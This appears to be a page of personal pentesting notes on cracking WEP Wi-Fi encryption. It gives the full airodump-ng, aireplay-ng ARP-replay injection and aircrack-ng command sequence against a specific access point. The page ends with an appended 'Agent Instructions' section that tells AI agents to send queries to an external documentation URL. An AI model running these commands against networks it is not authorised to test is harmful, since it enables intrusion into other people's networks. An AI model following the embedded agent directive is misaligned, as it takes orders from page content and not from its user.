# WEP

{% embed url="<https://null-byte.wonderhowto.com/how-to/hack-wi-fi-hunting-down-cracking-wep-networks-0183712/>" %}

Look at how the ARP Request Replay attack works. Essentially it tries to find an ARP packet and once it does, it replays it to the victim AP. You keep replaying it until you capture enough IVs and then you can crack the WEP key. No need for a wordlist.

## 1. Start airodump-ng

To capture packets:

```bash
sudo airodump-ng --bssid F0:9F:C2:AA:19:29 -c 1 -w wep wlan0mon
```

## 2. Send packets with injection

```bash
sudo aireplay-ng -3 -b F0:9F:C2:AA:19:29 -h 02:00:00:00:00:00 wlan0mon
```

Get your own MAC using:

```bash
macchanger --show wlan0mon
```

Now wait for 30 to 60 seconds

## 3. Crack it

```bash
aircrack-ng wep-01.cap
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://notes.incendium.rocks/pentesting-notes/wireless-networks/wep.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
